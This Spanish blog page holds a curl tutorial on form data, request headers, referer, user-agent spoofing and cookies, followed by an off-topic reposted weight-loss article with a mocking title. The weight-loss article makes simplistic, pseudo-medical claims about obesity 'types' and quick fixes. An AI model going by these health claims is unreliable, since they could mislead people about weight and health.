Los formularios son como un sitio web presenta una página HTML con campos para que el usuario ingrese datos en ellos, y de alguna manera presione sobre algo que diga ‘enviar’ con forma de botón para obtener esos datos y eviarlos al servidor.

Típicamente, el servidor usa los datos enviados para decidir qué hacer. Como utilizar las palabras que se han ingresado y buscar en una base de datos, o para añadir esta información en un sistema de rastreo/seguimiento de errores, mostrar la dirección ingresada sobre un mapa o utilizar la información como un indicador de registro verificando que el usuario le está permitido ver lo que debe autorizado para ver.

Utilizando la opción -d se puede especificar nombres y valores codificados en la URL:
curl -d "prefisso=051" -d "numero=806060" -d "Prosegui=Verifica" -d "form_name=verifica_copertura_ehiveco" http://www.ovus.it/verifica_copertura_ehiveco.php

Un camino muy común para las aplicaciones basadas en HTML para pasar el estado de la información entre las páginas, es añadir campos ocultos en los formularios. Los campos ocultos ya están completados con información, y ellos no pueden ser mostrados al usuario y tienen que ser pasados de largo tal como el resto de los otros campos. Para curl no hay diferencia entre ellos, sólo necesitas en la línea de comandos.

Establecer Peticiones de Cabecera [Set Request Headers]

Las Peticiones de Cabeceras o "Request headers" permite a los clientes proveer a los servidores con meta información sobre cosas tal como Autorización, capacidades, y tipo de contenido en el cuerpo de la página. OAuth2 utiliza una cabecera Authorization para pasar señales de acceso, por ejemplo.

Las cabeceras personalizadas se pueden establecer en curl utilizando la opción -H :
curl -H "Authorization: OAuth 2c4419d1aabeec" http://echo.httpkit.com
curl -H "Accept: application/json" -H "Authorization: OAuth 2c3455d1aeffc" http://echo.httpkit.com

Hay que notar que si se debería añadir una cabecera personalizada que tiene el mismo nombre de una cabecera interna curl utilizará la cabecera establecida de forma externa en lugar de la interna. No se deberían reemplazar cabeceras que son establecidas de forma interna sin saber perfectamente bien qué es lo que se está haciendo. Eliminar una cabecera interna dando un reemplazo sin contenido en el lado derecho de los dos puntos, como en: -H "Host:".

Si se envía la cabecera personalizada sin valor alguno, entonces esta cabecera debe ser finalizada con punto y coma, tal como: -H "X-Custom-Header;" para enviar "X-Custom-Header:".

curl asegurará que cada cabecera que se añada o se elimine sea enviada con el marcador apropiado de "fin-de-línea", por lo tanto, no se debería añadir esto como parte del contenido de la cabecera: saltos de línea o retornos de carro, lo único que harán es estropearte las cosas.

Referer

Una petición HTTP podría incluir un campo referer, el cual puede ser usado para decir desde cual URL el cliente obtuvo un recurso en particular. Algunos programas/scripts revisan el campo referer de las peticiones para verificar que este no está llegando de un sitio externo o de una página desconocida. Mientras que esto es una forma estúpida de verificar algo y que puede ser fácilmente forzado, muchos scripts todavía lo hacen de esta forma.

Esto puede ser establecido con el indicador -H, --header por supuesto. Cuando se utiliza con -L, --location se puede añadir ";auto" al indicador --referer de la URL para hacer que automáticamente curl establezca la URL previa cuando de seguimiento a una cabecera Location: .

La cadena ";auto" puede ser utilizada ella sola, aún si no se estableció un --referer inicial.
curl -e google.com http://echo.httpkit.com

User Agent

Para especificar la cadena User-Agent y envarla al servidor HTTP se puede utilizar el modificador --user-agent. Para codificar espacios en blanco en la cadena, hay que encerrar la cadena entre comillas simples. Por supuesto, esto también puede ser establecido con la opción -H, --header.

Muchas aplicaciones utilizan esta información para decidir como mostrar las páginas. A veces, notarás que obtener una página con curl no devolverá la misma página que puedes obtener si accedes o la visualizas con tu navegador favorito. Es allí cuando sabes que es tiempo de establecer el campo User Agent para engañar al servidor y hacerlo creer que tú eres uno de esos navegadores:
curl -A "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_2 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8H7 Safari/6533.18.5" http://echo.httpkit.com

Cookies

La forma en que los navegadores web hacen “control de estado en el lado del cliente” es utilizando Cookies. Las cookies son solamente nombres con contenidos asociados. Las cookies son enviadas al cliente por el servidor. El servidor le dice al cliente por qué ruta y nombre de host éste quiere que la cookie sea enviada de regreso, así también en ella envía información de la fecha de caducidad y unas cuantas propiedades mas.

Cuando un cliente se comunica con un servidor por medio de un nombre y una ruta que se ha establecido previamente en una cookie que se ha recibido, el cliente envía de regreso las cookies y sus contenidos al servidor, a menos que esta ya haya caducado.

Muchas aplicaciones y servidores utilizan este método para conectar una serie de peticiones dentro de una sola sesión lógica. Para poder utilizar curl en tales situaciones, debemos poder grabar y enviar de regreso las cookies en la forma que el servidor web las espera. De la misma manera que los navegadores interactúan con ellas.
De una forma supuesta, la data recivida previamente del servidor se encuentra en una línea "Set-Cookie:". La data debería estar en el formato "NAME1=VALUE1; NAME2=VALUE2".

Sino se utiliza el símbolo igual ( = ) en la línea, es tratado como un nombre de fichero de donde se suele leer las líenas almacenadas previamente en la cookie, el cual debería ser utilizado en esta sesión si ellos se emparentan.

Al utilizar este métido también se actuva el "analizador de cookies" el cual hará que curl grabe las cookies entrantes, lo cual podría ser manipulable si se está utilizando en combinación con la opción -L, --location.

El formato de archivo de donde se leen las cookies deberían ser cabeceras planas HTTP o en el formato de archivo de cookie de Netscape/Mozilla. NOTE que el fichero especificado con la opción -b, --cookie es solamente utilizado como entrada. Las cookies no serán almacenadas en el fichero. Para almacenar cookies, hay que utilizar las opciones -c, --cookie-jar o también se pueden cabeceras HTTP a un fichero utilizando el modificador -D, --dump-header:
curl --cookie "name=whitehatty" http://echo.httpkit.com
curl -c cookies.txt http://www.facebook.com
sed -i '' s/#HttpOnly_\.facebook\.com/echo\.httpkit\.com/g cookies.txt
curl --cookie cookies.txt http://echo.httpkit.com
curl -b cookies.txt --cookie-jar newcookies.txt http://echo.httpkit.com
curl --dump-header headers_and_cookies http://www.facebook.com

Trabajo en progreso…

Hay muchas más opciones, pero hay que hacer una pausa por ahora. Poco a poco se irán añadiendo más ejemplos de característica en el futuro, así que pendientes a las actualizaciones...
Read more ►

domingo, 31 de mayo de 2015

[OFF-TOPIC] GORDOSSSS, Esta es tu GRASA y así la puedes ELIMINAR... }:-]

0 comentarios
Filosoraptor - http://populares.filosoraptor.org/2015/05/esta-es-tu-grasa-y-asi-la-puedes.html

Fuente del Articulo

No cabe duda de que uno de los mayores traumas de todo ser humano es su peso. Es como una lucha interminable que sencillamente parece no tener fin, sin embargo, es probable que la razón por la que aún no has conseguido bajar esos kilitos que tanto te atormentan, se deba principalmente a que ni tú mismo/a sabes el motivo por el cual esa molesta grasita se ha instalado en tu cuerpo y parece no querer salir.

Basta de sufrir, aquí te mostraremos la razón por la que lejos de bajar pareces estar ganando peso y te diremos como eliminarlo de una forma efectiva, fácil y rápida:

1| Obesidad alimentaria
Aunque no lo creas, no todo el sobrepeso se debe a la ingesta excesiva o inadecuada de alimentos, sin embargo, si tú eres de las personas a las que les fascina los carbohidratos y azucares, es evidente que esta es la razón por la cual la obesidad se ha apoderado de ti.

No te mortifiques, por increíble que parezca, este tipo de sobrepeso es uno de los más sencillos para bajar, lo único que necesitas es mucha fuerza de voluntad y comenzar una alimentación más saludable, acompañada de una pequeña rutina de ejercicio diaria. Tranquilo/a, no se trata de que pases tres horas en el gimnasio ni de que te dediques a comer solo lechuga, sino de que mantengas una alimentación balanceada en donde se encuentren presentes todos los alimentos pero en pequeñas cantidades. Combina esto con un poco de actividad física como caminar 30 minutos, baile, ejercicios caseros, etc. Y en pocas semanas estarás disfrutando de los resultados.

2| Obesidad abdominal nerviosa
No, no es un juego, es 100% real. Si eres una persona que suele estresarse fácilmente o ser víctima constante de la depresión o ansiedad, es muy probable que sufras de este tipo de obesidad, ya que tu necesidad por el consumo de azucares se verá incrementada. Es importante que comiences a buscar actividades extras que te permitan liberar todas tus emociones, a fin de que evites refugiarte en la comida, de tal forma, que junto con ello comiences a liberarte de esos kilitos que atormentan aún más.

3| Obesidad Glútea
Este tipo de obesidad es propia de las mujeres durante la etapa de la adolescencia, menopausia o bien, de aquellas que sufren de desequilibrio hormonal.

La única manera de eliminar este tipo de grasa es mediante actividad física, ya que como te comentamos, es producida meramente por un desequilibrio, sin embargo, lo más recomendable es realizar ejercicio tipo sentadillas, estocadas, abdominales, etc. Y no solo correr como en la mayoría de los casos se recomendaría.

4| Obesidad metabólica aterógena
La gordura de las personas que sufren de este tipo de obesidad, suele centrarse en el estómago, ya que se debe al consumo excesivo de alcohol, por lo que quienes la padecen, suelen sufrir también de malestares como problemas para respirar, presión, etc.

Como podrás imaginar, el fin a este mal es muy sencillo, solo basta con que dejes de consumir alcohol y en menos de lo que te imaginas, tu estomago reducirá su tamaño y tus síntomas irán desapareciendo como por arte de magia.

5| Obesidad circulatoria venosa
Lamentablemente esto no es algo que puedes controlar fácilmente, ya que se debe básicamente a problemas genéticos, por lo que para contrarrestar este tipo de obesidad, se recomienda realizar ejercicios como natación, bicicleta fija, etc. Así mismo, es recomendable el consumo de mucha agua y la reducción de alimentos con altas cantidades de sodio.

6| Obesidad por sedentarismo
Este tipo de sobrepeso puede ser apreciado en personas con actividades físicas nulas o bien, aquellas acostumbradas al ejercicio y que de repente lo han dejado.
Si tú sufres de este padecimiento, lo mejor que puedes hacer es comenzar con algún tipo de actividad física y realizar por lo menos seis comidas diarias en pequeñas porciones, de tal forma, que tu cuerpo lejos de acumular grasa, comience a quemarla.
 Ya no tienes pretexto para lucir el cuerpo que siempre soñaste, identifica tu tipo de obesidad y manos a la obra, es momento de trabajar para perder esos molestos kilitos de más.
Si gustas, comparte este artículo con todos tus SERES QUERIDOS y dejen YA de sufrir por esa grasa de más. Elimínala de forma fácil, rápida y saludable.
Read more ►
 

Copyright © El igloo de Tux Design by O Pregador | Blogger Theme by Blogger Template de luxo | Powered by Blogger